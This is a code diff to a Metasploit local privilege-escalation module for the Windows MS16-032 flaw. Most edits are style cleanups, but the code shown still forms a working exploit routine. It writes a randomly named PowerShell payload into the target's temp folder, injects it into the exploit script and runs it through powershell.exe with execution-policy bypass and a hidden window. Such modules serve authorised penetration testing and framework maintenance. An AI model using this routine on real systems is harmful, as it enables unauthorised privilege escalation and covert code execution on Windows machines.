@@ -25,13 +25,18 @@ class MetasploitModule < Msf::Exploit::Local
           Powershell 2.0 or later and systems with two or more CPU cores.
         },
         'License' => BSD_LICENSE,
+        'Notes' => {
+          'Stability' => [],
+          'SideEffects' => [],
+          'Reliability' => []
+        },
         'Author' => [
           'James Forshaw', # twitter.com/tiraniddo
           'b33f', # @FuzzySec, http://www.fuzzysecurity.com'
           'khr0x40sh'
         ],
         'References' => [
-          [ 'MS', 'MS16-032'],
+          [ 'MSB', 'MS16-032'],
           [ 'CVE', '2016-0099'],
           [ 'URL', 'https://twitter.com/FuzzySec/status/723254004042612736' ],
           [ 'URL', 'https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html']
@@ -76,9 +81,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    os = sysinfo["OS"]
-
-    if os !~ /win/i
+    unless session.platform == 'windows'
       # Non-Windows systems are definitely not affected.
       return Exploit::CheckCode::Safe
     end
@@ -98,7 +101,7 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     if check == Exploit::CheckCode::Safe
-      fail_with(Failure::NotVulnerable, "Target is not vulnerable")
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
     end
 
     # Exploit PoC from 'b33f'
@@ -111,9 +114,9 @@ class MetasploitModule < Msf::Exploit::Local
     payload_arch = framework.payloads.create(datastore['PAYLOAD']).arch.first
 
     if sysinfo['Architecture'] == ARCH_X64 && payload_arch == ARCH_X86
-      cmdstr.gsub!("System32", "SYSWOW64")
-      print_warning("Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell")
-      vprint_warning("#{cmdstr}")
+      cmdstr.gsub!('System32', 'SYSWOW64')
+      print_warning('Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell')
+      vprint_warning(cmdstr.to_s)
     end
 
     template_path = Rex::Powershell::Templates::TEMPLATE_DIR
@@ -121,41 +124,41 @@ class MetasploitModule < Msf::Exploit::Local
 
     psh_payload = compress_script(psh_payload)
 
-    @upfile = Rex::Text.rand_text_alpha((rand(8) + 6)) + ".ps1"
+    @upfile = Rex::Text.rand_text_alpha(rand(6..13)) + '.ps1'
     path = datastore['W_PATH'] || expand_path('%TEMP%')
     @upfile = "#{path}\\#{@upfile}"
-    fd = session.fs.file.new(@upfile, "wb")
+    fd = session.fs.file.new(@upfile, 'wb')
     print_status("Writing payload file, #{@upfile}...")
     fd.write(psh_payload)
     fd.close
     psh_cmd = " -exec Bypass -nonI -window Hidden #{@upfile}"
 
     # lpAppName
-    ms16_032.gsub!("$cmd", "\"#{cmdstr}\"")
+    ms16_032.gsub!('$cmd', "\"#{cmdstr}\"")
     # lpcommandLine - capped at 1024b
-    ms16_032.gsub!("$args1", "\"#{psh_cmd}\"")
+    ms16_032.gsub!('$args1', "\"#{psh_cmd}\"")
     end_flag = Rex::Text.rand_text_alphanumeric(32)
-    ms16_032.gsub!("$end", end_flag)
+    ms16_032.gsub!('$end', end_flag)
 
     print_status('Compressing script contents...')
     ms16_032_c = compress_script(ms16_032)
 
     if ms16_032_c.size > 8100
       print_error("Compressed size: #{ms16_032_c.size}")
-      error_msg = "Compressed size may cause command to exceed "
+      error_msg = 'Compressed size may cause command to exceed '
       error_msg += "cmd.exe's 8kB character limit."
       print_error(error_msg)
     else
       print_good("Compressed size: #{ms16_032_c.size}")
     end
 
-    print_status("Executing exploit script...")
+    print_status('Executing exploit script...')
 
     cmd = expand_path('%windir%')
     if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
-      cmd += "\\Sysnative"
+      cmd += '\\Sysnative'
     else
-      cmd += "\\System32"
+      cmd += '\\System32'
     end
 
     cmd += "\\windowspowershell\\v1.0\\powershell.exe -exec Bypass -nonI -window Hidden \"#{ms16_032_c}\""
@@ -175,9 +178,9 @@ class MetasploitModule < Msf::Exploit::Local
       r.channel.close
       r.close
 
-      print_good("Executed on target machine.")
-    rescue
-      print_error("An error occurred executing the script.")
+      print_good('Executed on target machine.')
+    rescue StandardError
+      print_error('An error occurred executing the script.')
     end
   end
 
